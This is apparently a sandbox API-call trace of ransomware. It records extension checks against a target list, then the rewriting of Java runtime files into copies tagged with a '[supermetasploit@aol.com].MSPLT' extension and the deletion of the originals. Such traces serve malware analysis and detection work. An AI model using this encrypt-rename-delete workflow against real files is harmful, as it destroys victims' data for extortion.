lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0308.683] lstrlenW (lpString=".rar") returned 4 [0308.683] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0308.683] lstrlenW (lpString=".bz2") returned 4 [0308.683] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0308.683] lstrlenW (lpString=".7z") returned 3 [0308.683] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0308.683] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 72 [0308.683] lstrlenW (lpString=".dbf") returned 4 [0308.683] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0308.684] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 72 [0308.684] lstrlenW (lpString=".1cd") returned 4 [0308.684] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0308.684] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 72 [0308.684] lstrlenW (lpString=".jpg") returned 4 [0308.684] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0308.684] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 72 [0308.684] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 72 [0308.684] lstrlenW (lpString=".doc") returned 4 [0308.684] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0308.684] lstrlenW (lpString=".docx") returned 5 [0308.684] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0308.684] lstrlenW (lpString=".pdf") returned 4 [0308.684] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0308.684] lstrlenW (lpString=".xls") returned 4 [0308.684] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0308.684] lstrlenW (lpString=".xlsx") returned 5 [0308.685] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0308.685] lstrlenW (lpString=".ppt") returned 4 [0308.685] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0308.685] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 72 [0308.685] lstrlenW (lpString=".zip") returned 4 [0308.685] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0308.685] lstrlenW (lpString=".rar") returned 4 [0308.685] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0308.685] lstrlenW (lpString=".bz2") returned 4 [0308.685] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0308.685] lstrlenW (lpString=".7z") returned 3 [0308.685] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0308.685] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 72 [0308.685] lstrlenW (lpString=".dbf") returned 4 [0308.686] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0308.686] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 72 [0308.686] lstrlenW (lpString=".1cd") returned 4 [0308.686] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0308.686] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\cursors.properties") returned 72 [0308.686] lstrlenW (lpString=".jpg") returned 4 [0308.686] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0308.686] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0308.686] lstrlenW (lpString="jce.jar") returned 7 [0308.686] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0308.687] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=116446) returned 1 [0308.687] CloseHandle (hObject=0x524) returned 1 [0308.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar")) returned 0x20 [0308.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0308.687] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0308.687] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.688] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.688] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0308.688] GetLastError () returned 0x0 [0308.688] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x1c6de, lpOverlapped=0x0) returned 1 [0308.701] WriteFile (in: hFile=0x540, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x1c6e0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x1c6e0, lpOverlapped=0x0) returned 1 [0308.704] ReadFile (in: hFile=0x524, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0308.704] WriteFile (in: hFile=0x540, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xe2, lpOverlapped=0x0) returned 1 [0308.705] SetEndOfFile (hFile=0x540) returned 1 [0308.705] CloseHandle (hObject=0x540) returned 1 [0308.709] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.709] SetEndOfFile (hFile=0x524) returned 1 [0309.221] CloseHandle (hObject=0x524) returned 1 [0309.221] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0309.756] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar")) returned 1 [0309.758] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 46 [0309.758] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 46 [0309.758] lstrlenW (lpString=".doc") returned 4 [0309.758] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0309.758] lstrlenW (lpString=".docx") returned 5 [0309.758] lstrcmpiW (lpString1=".docx", lpString2="e.jar") returned -1 [0309.758] lstrlenW (lpString=".pdf") returned 4 [0309.758] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0309.758] lstrlenW (lpString=".xls") returned 4 [0309.758] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0309.758] lstrlenW (lpString=".xlsx") returned 5 [0309.758] lstrcmpiW (lpString1=".xlsx", lpString2="e.jar") returned -1 [0309.759] lstrlenW (lpString=".ppt") returned 4 [0309.759] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0309.759] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 46 [0309.759] lstrlenW (lpString=".zip") returned 4 [0309.759] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0309.759] lstrlenW (lpString=".rar") returned 4 [0309.759] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0309.759] lstrlenW (lpString=".bz2") returned 4 [0309.759] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0309.759] lstrlenW (lpString=".7z") returned 3 [0309.759] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0309.759] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 46 [0309.759] lstrlenW (lpString=".dbf") returned 4 [0309.759] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0309.759] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 46 [0309.759] lstrlenW (lpString=".1cd") returned 4 [0309.759] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0309.759] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 46 [0309.759] lstrlenW (lpString=".jpg") returned 4 [0309.759] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0309.759] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 46 [0309.759] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 46 [0309.759] lstrlenW (lpString=".doc") returned 4 [0309.759] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0309.759] lstrlenW (lpString=".docx") returned 5 [0309.760] lstrcmpiW (lpString1=".docx", lpString2="e.jar") returned -1 [0309.760] lstrlenW (lpString=".pdf") returned 4 [0309.760] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0309.760] lstrlenW (lpString=".xls") returned 4 [0309.760] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0309.760] lstrlenW (lpString=".xlsx") returned 5 [0309.760] lstrcmpiW (lpString1=".xlsx", lpString2="e.jar") returned -1 [0309.760] lstrlenW (lpString=".ppt") returned 4 [0309.760] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0309.760] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 46 [0309.760] lstrlenW (lpString=".zip") returned 4 [0309.760] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0309.760] lstrlenW (lpString=".rar") returned 4 [0309.760] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0309.760] lstrlenW (lpString=".bz2") returned 4 [0309.760] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0309.760] lstrlenW (lpString=".7z") returned 3 [0309.760] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0309.760] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 46 [0309.760] lstrlenW (lpString=".dbf") returned 4 [0309.760] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0309.760] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 46 [0309.760] lstrlenW (lpString=".1cd") returned 4 [0309.760] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0309.760] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar") returned 46 [0309.760] lstrlenW (lpString=".jpg") returned 4 [0309.760] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0309.761] lstrcmpiW (lpString1=".jfc", lpString2=".MSPLT") returned -1 [0309.761] lstrlenW (lpString="default.jfc") returned 11 [0309.761] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0310.334] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=20109) returned 1 [0310.334] CloseHandle (hObject=0x470) returned 1 [0310.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc")) returned 0x20 [0310.334] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0310.335] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0310.335] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.335] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.335] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0310.843] GetLastError () returned 0x0 [0310.843] ReadFile (in: hFile=0x470, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x4e8d, lpOverlapped=0x0) returned 1 [0311.891] WriteFile (in: hFile=0x524, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x4e90, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x4e90, lpOverlapped=0x0) returned 1 [0311.998] ReadFile (in: hFile=0x470, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0311.998] WriteFile (in: hFile=0x524, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xea, lpOverlapped=0x0) returned 1 [0311.999] SetEndOfFile (hFile=0x524) returned 1 [0311.999] CloseHandle (hObject=0x524) returned 1 [0312.004] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.004] SetEndOfFile (hFile=0x470) returned 1 [0312.065] CloseHandle (hObject=0x470) returned 1 [0312.066] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0312.067] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jfr\\default.jfc")) returned 1 [0312.067] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 54 [0312.067] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 54 [0312.068] lstrlenW (lpString=".doc") returned 4 [0312.068] lstrcmpiW (lpString1=".doc", lpString2=".jfc") returned -1 [0312.068] lstrlenW (lpString=".docx") returned 5 [0312.068] lstrcmpiW (lpString1=".docx", lpString2="t.jfc") returned -1 [0312.068] lstrlenW (lpString=".pdf") returned 4 [0312.068] lstrcmpiW (lpString1=".pdf", lpString2=".jfc") returned 1 [0312.068] lstrlenW (lpString=".xls") returned 4 [0312.068] lstrcmpiW (lpString1=".xls", lpString2=".jfc") returned 1 [0312.068] lstrlenW (lpString=".xlsx") returned 5 [0312.068] lstrcmpiW (lpString1=".xlsx", lpString2="t.jfc") returned -1 [0312.068] lstrlenW (lpString=".ppt") returned 4 [0312.068] lstrcmpiW (lpString1=".ppt", lpString2=".jfc") returned 1 [0312.068] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 54 [0312.068] lstrlenW (lpString=".zip") returned 4 [0312.068] lstrcmpiW (lpString1=".zip", lpString2=".jfc") returned 1 [0312.068] lstrlenW (lpString=".rar") returned 4 [0312.068] lstrcmpiW (lpString1=".rar", lpString2=".jfc") returned 1 [0312.068] lstrlenW (lpString=".bz2") returned 4 [0312.068] lstrcmpiW (lpString1=".bz2", lpString2=".jfc") returned -1 [0312.068] lstrlenW (lpString=".7z") returned 3 [0312.068] lstrcmpiW (lpString1=".7z", lpString2="jfc") returned -1 [0312.069] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 54 [0312.069] lstrlenW (lpString=".dbf") returned 4 [0312.069] lstrcmpiW (lpString1=".dbf", lpString2=".jfc") returned -1 [0312.069] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 54 [0312.069] lstrlenW (lpString=".1cd") returned 4 [0312.069] lstrcmpiW (lpString1=".1cd", lpString2=".jfc") returned -1 [0312.069] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 54 [0312.069] lstrlenW (lpString=".jpg") returned 4 [0312.069] lstrcmpiW (lpString1=".jpg", lpString2=".jfc") returned 1 [0312.069] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 54 [0312.069] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 54 [0312.069] lstrlenW (lpString=".doc") returned 4 [0312.069] lstrcmpiW (lpString1=".doc", lpString2=".jfc") returned -1 [0312.069] lstrlenW (lpString=".docx") returned 5 [0312.069] lstrcmpiW (lpString1=".docx", lpString2="t.jfc") returned -1 [0312.069] lstrlenW (lpString=".pdf") returned 4 [0312.069] lstrcmpiW (lpString1=".pdf", lpString2=".jfc") returned 1 [0312.069] lstrlenW (lpString=".xls") returned 4 [0312.069] lstrcmpiW (lpString1=".xls", lpString2=".jfc") returned 1 [0312.069] lstrlenW (lpString=".xlsx") returned 5 [0312.070] lstrcmpiW (lpString1=".xlsx", lpString2="t.jfc") returned -1 [0312.070] lstrlenW (lpString=".ppt") returned 4 [0312.070] lstrcmpiW (lpString1=".ppt", lpString2=".jfc") returned 1 [0312.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 54 [0312.070] lstrlenW (lpString=".zip") returned 4 [0312.070] lstrcmpiW (lpString1=".zip", lpString2=".jfc") returned 1 [0312.070] lstrlenW (lpString=".rar") returned 4 [0312.070] lstrcmpiW (lpString1=".rar", lpString2=".jfc") returned 1 [0312.070] lstrlenW (lpString=".bz2") returned 4 [0312.070] lstrcmpiW (lpString1=".bz2", lpString2=".jfc") returned -1 [0312.070] lstrlenW (lpString=".7z") returned 3 [0312.070] lstrcmpiW (lpString1=".7z", lpString2="jfc") returned -1 [0312.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 54 [0312.070] lstrlenW (lpString=".dbf") returned 4 [0312.070] lstrcmpiW (lpString1=".dbf", lpString2=".jfc") returned -1 [0312.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 54 [0312.070] lstrlenW (lpString=".1cd") returned 4 [0312.070] lstrcmpiW (lpString1=".1cd", lpString2=".jfc") returned -1 [0312.070] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\default.jfc") returned 54 [0312.070] lstrlenW (lpString=".jpg") returned 4 [0312.071] lstrcmpiW (lpString1=".jpg", lpString2=".jfc") returned 1 [0312.071] lstrcmpiW (lpString1=".jar", lpString2=".MSPLT") returned -1 [0312.071] lstrlenW (lpString="jsse.jar") returned 8 [0312.071] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0312.072] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=584576) returned 1 [0312.072] CloseHandle (hObject=0x470) returned 1 [0312.072] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar")) returned 0x20 [0312.072] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.072] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0312.073] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.073] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.073] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0312.074] GetLastError () returned 0x0 [0312.074] ReadFile (in: hFile=0x470, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x8eb80, lpOverlapped=0x0) returned 1 [0312.461] WriteFile (in: hFile=0x530, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x8eb90, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x8eb90, lpOverlapped=0x0) returned 1 [0312.498] ReadFile (in: hFile=0x470, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0312.498] WriteFile (in: hFile=0x530, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xe4, lpOverlapped=0x0) returned 1 [0312.498] SetEndOfFile (hFile=0x530) returned 1 [0312.645] CloseHandle (hObject=0x530) returned 1 [0312.664] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.664] SetEndOfFile (hFile=0x470) returned 1 [0313.631] CloseHandle (hObject=0x470) returned 1 [0313.631] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0313.988] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jsse.jar")) returned 1 [0314.059] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 47 [0314.059] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 47 [0314.059] lstrlenW (lpString=".doc") returned 4 [0314.059] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.059] lstrlenW (lpString=".docx") returned 5 [0314.060] lstrcmpiW (lpString1=".docx", lpString2="e.jar") returned -1 [0314.060] lstrlenW (lpString=".pdf") returned 4 [0314.060] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.060] lstrlenW (lpString=".xls") returned 4 [0314.060] lstrcmpiW (lpString1=".xls", lpString2=".jar") returned 1 [0314.060] lstrlenW (lpString=".xlsx") returned 5 [0314.060] lstrcmpiW (lpString1=".xlsx", lpString2="e.jar") returned -1 [0314.060] lstrlenW (lpString=".ppt") returned 4 [0314.060] lstrcmpiW (lpString1=".ppt", lpString2=".jar") returned 1 [0314.060] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 47 [0314.060] lstrlenW (lpString=".zip") returned 4 [0314.060] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0314.060] lstrlenW (lpString=".rar") returned 4 [0314.060] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0314.060] lstrlenW (lpString=".bz2") returned 4 [0314.060] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0314.060] lstrlenW (lpString=".7z") returned 3 [0314.060] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0314.060] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 47 [0314.060] lstrlenW (lpString=".dbf") returned 4 [0314.060] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0314.060] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 47 [0314.060] lstrlenW (lpString=".1cd") returned 4 [0314.060] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0314.060] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 47 [0314.060] lstrlenW (lpString=".jpg") returned 4 [0314.060] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0314.061] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 47 [0314.061] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jsse.jar") returned 47 [0314.061] lstrlenW (lpString=".doc") returned 4 [0314.061] lstrcmpiW (lpString1=".doc", lpString2=".jar") returned -1 [0314.061] lstrlenW (lpString=".docx") returned 5 [0314.061] lstrcmpiW (lpString1=".docx", lpString2="e.jar") returned -1 [0314.061] lstrlenW (lpString=".pdf") returned 4 [0314.061] lstrcmpiW (lpString1=".pdf", lpString2=".jar") returned 1 [0314.061] lstrlenW (lpString=".xls") returned 4 [0314.061] 